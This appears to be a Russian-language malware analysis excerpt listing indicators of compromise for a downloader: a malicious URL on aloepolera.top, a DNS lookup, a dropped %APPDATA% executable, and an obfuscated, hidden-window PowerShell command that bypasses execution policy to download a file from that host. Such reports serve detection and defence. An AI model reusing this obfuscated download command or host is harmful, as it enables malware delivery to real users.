Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwErS^hEL^l.E^XE -EXE^cU^tiO^np^OliCy By^P^aSS^ -NoProfIL^e -w^iND^O^WS^tyLE^ ^hid^d^en (N^ew^-OBject sY^s^TE^m.nEt.^WE^bCLI^e^nt).do^wNloAdFiLE(^'http://aloepolera.top...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "pOwErS^hEL^l.E^XE -EXE^cU^tiO^np^OliCy By^P^aSS^ -NoProfIL^e -w^iND^O^WS^tyLE^ ^hid^d^en (N^ew^-OBject sY^s^TE^m.nEt.^WE^bCLI^e^nt).do^wNloAdFiLE(^'http://aloepolera.top...' (со скрытым окном)